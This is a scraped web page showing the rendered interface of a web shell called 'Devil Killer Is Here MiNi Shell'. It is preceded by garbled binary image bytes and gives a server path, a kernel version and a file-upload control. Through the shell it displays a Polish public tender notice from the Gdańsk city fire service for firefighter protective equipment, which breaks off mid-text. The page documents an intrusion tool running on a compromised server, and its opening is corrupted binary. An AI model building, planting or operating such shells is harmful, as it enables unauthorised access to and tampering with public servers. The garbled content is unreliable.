JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20251030/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20251030/0050697501-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa środków ochrony indywidualnej dla Komendy Miejskiej Państwowej Straży Pożarnej w Gdańsku w ramach ochrony ludności i obrony cywilnej </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Komenda Miejska Państwowej Straży Pożarnej w Gdańsku</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 191123504</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Beniowskiego 7</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gdańsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">80-382</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL633 - Trójmiejski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat.przetargi@kmpsp.gda.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.gov.pl/web/kmpsp-gdansk</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa środków ochrony indywidualnej dla Komendy Miejskiej Państwowej Straży Pożarnej w Gdańsku w ramach ochrony ludności i obrony cywilnej </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d3859f96-c173-4bf2-93d5-3083833489ff</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00506975</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-10-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00180846/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.8 Dostawa środków ochrony indywidualnej dla Komendy Miejskiej Państwowej Straży Pożarnej w Gdańsku</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-d3859f96-c173-4bf2-93d5-3083833489ff <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym a Wykonawcami w postęp. o udzieleniu<br/>zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a<br/>Wykonawcą, z uwzględnieniem wyjątków określonych w ustawie Pzp, odbywa się przy użyciu środków komunikacji elektronicznej. 2.<br/>Postępowanie prowadzone jest w języku polskim, w formie elektronicznej, za pośrednictwem platformy e-Zamówienia, która dostępna jest pod adresem: https://ezamowienia.gov.pl, adres strony prowadzonego postępowania: ): https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-d3859f96-c173-4bf2-93d5-3083833489ff.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postęp. o udzielenie zamówienia<br/>komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu platformy e-Zamówienia. 2. Wykonawca zamierzający<br/>wziąć udział w postęp. o udzielenie zam. publicz. musi posiadać konto podmiotu „Wykonawca” na Platformie. 3. Sposób<br/>sporządzenia dokum. elektr. lub dok. elektr. będących kopią elektr. treści zapisanej w postaci papierowej (cyfrowe odwzorowania)<br/>musi być zg. z wymaganiami określ. w rozp. Prezesa Rady Ministrów w/s wymagań dla dokum. elektron.. 4. Dok. elektr., o których<br/>mowa w § 2 ust. 1 rozp. Prezesa Rady Ministrów w/sp wymagań dla dokum. elektr., sporządza się w postaci elektr., w formatach<br/>danych określonych w przepisach rozp. Rady Ministrów w/s Krajowych Ram Interoperacyjności, z uwzględn. rodzaju<br/>przekazywanych danych i przekazuje się jako załączniki. 5. Inform., oświad. lub dokum., inne niż wymienione w § 2 ust. 1 rozp.<br/>Prezesa Rady Ministrów w/s wymagań dla dokum. elektron., przekazywane w postęp. sporządza się w postaci elektr.: w formatach<br/>danych określ. w przepisach rozp. Rady Ministrów w/s Krajowych Ram Interoperacyjności (i przekazuje się jako załącznik), lub jako<br/>tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej. 6. Jeżeli dokum. elektr.,<br/>przekazywane przy użyciu środków komunikacji elektr., zawierają inform. stanowiące tajemnicę przedsiębiorstwa w rozumieniu<br/>przepisów ustawy z dn. 16.04.93 r. o zwalczaniu nieuczciwej konkurencji wykonawca, w celu utrzymania w poufności tych informacji,<br/>przekazuje je w wydzielonym i odpowiednio oznaczonym pliku, wraz z jednoczesnym zaznaczeniem w nazwie pliku „Dokument<br/>stanowiący tajemnicę przedsiębiorstwa”. 7. Komunikacja w postęp., z wyłączeniem składania ofert, odbywa się drogą elektr. za<br/>pośredn. formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośredn. „Formularzy<br/>do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi.<br/>Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”). 8. W<br/>przypadku załączn., które są zg. z ustawą Pzp lub rozp. Prezesa Rady Ministrów w sprawie wymagań dla dokum. elektron.<br/>opatrzone kwalifik. podpisem elektr., podpisem zaufanym lub podpisem osobistym, mogą być opatrzone, zgodnie z wyborem<br/>wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie zam./podmiotu udostępniającego zasoby, podpisem typu<br/>zewnętrznego lub wewnętrznego. W zależności od rodzaju podpisu i jego typu (zewn., wewn.) dodaje się uprzednio podpisane<br/>dokumenty wraz z wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny). 9.<br/>Możliwość korzystania w postęp. z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na<br/>Platformie oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji” służących do zadawania<br/>pytań dot. treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego na Platformie. 10. Wszystkie<br/>wysłane i odebrane w postęp. przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w zakładce<br/>„Komunikacja”. 11. Maksym. rozmiar plików przesyłanych za pośredn. „Formularzy do komunikacji” wynosi 150 MB (wielkość ta<br/>dotyczy plików przesyłanych jako załączniki do jednego formularza). 12. Minim. wymagania techn. dot. sprzętu używanego w celu<br/>korzystania z usług Platformy oraz informacje dot. specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-d3859f96-c173-4bf2-93d5-3083833489ff.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 ogólnego rozporządzenia o ochronie danych osobowych z dnia 27 kwietnia 2016 r. Parlamentu Europejskiego i Rady (UE) 2016/679 informujemy, że:<br/>1) administratorem danych osobowych, które mogą zostać przekazane Zamawiającemu w toku niniejszego postępowania jest Komendant Miejski Państwowej Straży Pożarnej w Gdańsku, ul. Beniowskiego 7, 80-382 Gdańsk;<br/>2) kontakt do inspektora ochrony danych osobowych w Komendzie Miejskiej Państwowej Straży Pożarnej w Gdańsku: adres e-mail iod@straz.gda.pl, telefon 58 347 78 93;<br/>3) dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. b RODO w celu związanym z niniejszym postępowaniem prowadzonym w trybie podstawowym, w procedurze wyboru Wykonawcy i dalej w związku z realizowaną umową;<br/>4) odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o przepisy obowiązującego prawa, w tym w szczególności przepisy ustawy z 6 września 2001 r. o dostępie do informacji publicznej (t.j .Dz.U. z 2022 r., poz. 902);<br/>5) dane osobowe będą przechowywane do czasu potrzebnego na realizację i rozliczenie umowy oraz niezbędnego do przedawnienia ewentualnych roszczeń;<br/>6) podanie danych osobowych jest dobrowolne w celu zawarcia i wykonywania umowy łączącej Zamawiającego z Wykonawcą w ramach niniejszego postępowania prowadzonego w trybie podstawowym, aczkolwiek odmowa ich podania uniemożliwi podjęcie współpracy pomiędzy ww. stronami;<br/>7) w odniesieniu do danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>8) osoby, których dane osobowe zostaną przekazane Zamawiającemu w toku niniejszego postępowania posiadają:<br/>a) prawo dostępu do danych osobowych ich dotyczących;<br/>b) prawo do sprostowania danych osobowych ich dotyczących*;<br/>c) usunięcia danych osobowych ich dotyczących, w sytuacjach określonych w art. 17 ust. 1 RODO z zastrzeżeniem art. 17 ust. 3<br/>RODO;<br/>d) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>e) prawo wniesienia sprzeciwu wobec przetwarzania danych osobowych ich dotyczących;<br/>- o ile żądania nie są ewidentnie nieuzasadnione lub nadmierne oraz nie ograniczają ich, bądź wykluczają inne przepisy;<br/>9) osoby, których dane osobowe zostaną przekazane Zamawiającemu w toku niniejszego postępowania posiadają prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy którakolwiek z tych osób uzna, że przetwarzanie danych osobowych ich dotyczących narusza przepisy RODO.<br/>2. W zakresie wypełniania obowiązków informacyjnych przewidzianych w art. 13 RODO, Wykonawca składa oświadczenie zawarte w Formularzu oferty.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PT.2370.II.10.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest dostawa, w ramach zamówienia podstawowego, 65 kpl. ubrań specjalnych 4-częściowych dla Komendy Miejskiej Państwowej Straży Pożarnej w Gdańsku. <br/>2. Przedmiot zamówienia składa się z: ubrania specjalnego składającego się z kurtki i spodni zgodnych z normą PN-EN 469:2020 oraz ubrania specjalnego lekkiego składającego się z kurtki lekkiej oraz spodni lekkich do ubrania specjalnego, zgodnych z normą PN-EN ISO 15384. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">18410000-6 - Odzież specjalna</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1.	Zamawiający przewiduje zamówienie w ramach prawa, które będzie polegało na zwiększeniu zakresu przedmiotu zamówienia do 20 % wartości zamówienia podstawowego.<br/>2.	W ramach przedmiotu umowy Zamawiający, uprawniony jest do skorzystania z prawa opcji na zasadach i trybie opisanym poniżej: <br/>1)	Zamawiający może z opisanego w SWZ prawa opcji skorzystać w całym zakresie lub w części; <br/>2)	ewentualne zwiększenie zakresu zamówienia w ramach prawa opcji uzależnione będzie wyłącznie od potrzeb i możliwości finansowych Zamawiającego. <br/>3)	Zamawiający w ramach „prawa opcji” przewiduje możliwość zwiększenia wartości zamówienia o maksymalnie 20% wartości zamówienia podstawowego,<br/>4)	zamówienie realizowane w ramach opcji jest jednostronnym uprawnieniem Zamawiającego, dlatego też nieskorzystanie przez Zamawiającego z prawa opcji nie stanowi podstawy dla Wykonawcy do dochodzenia jakichkolwiek roszczeń w stosunku do Zamawiającego; <br/>5)	o dodatkowych dostawach (w ramach prawa opcji) Zamawiający poinformuje Wykonawcę w terminie do trzech tygodni od zawarcia niniejszej umowy.<br/>6)	Zamówienie objęte prawem opcji Wykonawca będzie zobowiązany wykonać po uprzednim otrzymaniu zawiadomienia od Zamawiającego, że zamierza z prawa opcji skorzystać, zawierającego ilość dodatkowych zamawianych kompletów przedmiotu umowy;<br/>7)	termin wykonania zamówienia objętego prawem opcji jest tożsamy z terminem realizacji podstawowego zakresu przedmiotu umowy. <br/>8)	zasady dotyczące realizacji zamówienia objętego prawem opcji będą takie same jak te, które obowiązują przy realizacji zamówienia podstawowego. Zamawiający zastrzega również, że ceny jednostkowe objęte opcją będą identyczne, jak w zamówieniu podstawowym oraz niezmienne w całym okresie realizacji umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający przyjmie do szczegółowego rozpatrywania oferty niepodlegające odrzuceniu.<br/>2. Stosowanie matematycznych obliczeń przy ocenie ofert, stanowi podstawową zasadę oceny ofert, które oceniane będą w<br/>odniesieniu do najkorzystniejszych warunków przedstawionych przez Wykonawców w zakresie każdego kryterium.<br/>3. Za parametry najkorzystniejsze w danym kryterium, oferta otrzyma maksymalną ilość punktów ustaloną w poniższym opisie,<br/>pozostałe będą oceniane odpowiednio - proporcjonalnie do parametru najkorzystniejszego, wybór oferty dokonany zostanie na<br/>podstawie opisanych kryteriów i ustaloną punktację: punktacja 0-100 (100% = 100 pkt). Zamawiający zastosuje zaokrąglenie<br/>wszystkich wyników do dwóch miejsc po przecinku.<br/>4. Wybór oferty zostanie dokonany w oparciu o przyjęte w niniejszym postępowaniu kryteria oceny ofert:<br/>1) Cena brutto - 40 %<br/>2) Parametry techniczne - 60 %<br/>Ocenie w oparciu o ww. kryteria oceny ofert poddawane są wyłącznie oferty niepodlegające odrzuceniu. Zamawiający udzieli<br/>zamówienia Wykonawcy, którego oferta przedstawi najkorzystniejszy bilans kryteriów oceny ofert określony w niniejszym przetargu,<br/>wyliczonych zgodnie ze wzorem:<br/>Lp = Lc + Lpt<br/>gdzie:<br/>Lp - łączna ilość punktów przyznanych ofercie<br/>Lc - ilość punktów przyznana badanej ofercie za kryterium „cena”<br/>Lpt - ilość punktów przyznana badanej ofercie za kryterium „parametry techniczne”<br/>Szczegółowy opis znajduje się w rozdz. XVIII SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Parametry techniczne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa wyposażenia osobistego strażaka dla Komendy Miejskiej PSP w Gdańsku, w ramach zamówienia podstawowego, w skład którego wchodzą niżej wymienione elementy:<br/>1)	hełm z latarką nahełmową ATEX - 65 szt.<br/>2)	rękawice techniczne - 36 par,<br/>3)	rękawice specjalne - 72 pary<br/>4)	bielizna termoaktywna - 36 kpl.<br/>5)	kominiarka - 72 szt.<br/>6)	buty specjalne gumowe - 36 par,<br/>7)	buty specjalne skórzane - 65 par,<br/>8)	narzędzie typu multitool - 36 szt.<br/>9)	worek transportowy (marynarski) - 36 szt. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">18444110-7 - Hełmy</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">18832000-0 - Obuwie specjalne</p> <p class="mb-0">35113400-3 - Odzież ochronna i zabezpieczająca</p> <p class="mb-0">18310000-5 - Bielizna osobista</p> <p class="mb-0">44510000-8 - Narzędzia</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1.	Zamawiający przewiduje zamówienie w ramach prawa, które będzie polegało na zwiększeniu zakresu przedmiotu zamówienia do 30 % wartości zamówienia podstawowego.<br/>2.	W ramach przedmiotu umowy Zamawiający, uprawniony jest do skorzystania z prawa opcji na zasadach i trybie opisanym poniżej: <br/>1)	Zamawiający może z opisanego w SWZ prawa opcji skorzystać w całym zakresie lub w części; <br/>2)	ewentualne zwiększenie zakresu zamówienia w ramach prawa opcji uzależnione będzie wyłącznie od potrzeb i możliwości finansowych Zamawiającego. <br/>3)	Zamawiający w ramach „prawa opcji” przewiduje możliwość zwiększenia wartości zamówienia o maksymalnie 30% wartości zamówienia podstawowego;<br/>4)	zamówienie realizowane w ramach opcji jest jednostronnym uprawnieniem Zamawiającego, dlatego też nieskorzystanie przez Zamawiającego z prawa opcji nie stanowi podstawy dla Wykonawcy do dochodzenia jakichkolwiek roszczeń w stosunku do Zamawiającego; <br/>5)	o dodatkowych dostawach (w ramach prawa opcji) Zamawiający poinformuje Wykonawcę w terminie do trzech tygodni od zawarcia niniejszej umowy.<br/>6)	Zamówienie objęte prawem opcji Wykonawca będzie zobowiązany wykonać po uprzednim otrzymaniu zawiadomienia od Zamawiającego, że zamierza z prawa opcji skorzystać, zawierającego liczbę dodatkowych zamawianych sztuk przedmiotu umowy;<br/>7)	termin wykonania zamówienia objętego prawem opcji jest tożsamy z terminem realizacji podstawowego zakresu przedmiotu umowy. <br/>8)	zasady dotyczące realizacji zamówienia objętego prawem opcji będą takie same jak te, które obowiązują przy realizacji zamówienia podstawowego. Zamawiający zastrzega również, że ceny jednostkowe objęte opcją będą identyczne, jak w zamówieniu podstawowym oraz niezmienne w całym okresie realizacji umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający przyjmie do szczegółowego rozpatrywania oferty niepodlegające odrzuceniu.<br/>2. Stosowanie matematycznych obliczeń przy ocenie ofert, stanowi podstawową zasadę oceny ofert, które oceniane będą w<br/>odniesieniu do najkorzystniejszych warunków przedstawionych przez Wykonawców w zakresie każdego kryterium.<br/>3. Ocenie w oparciu o ww. kryteria oceny ofert poddawane są 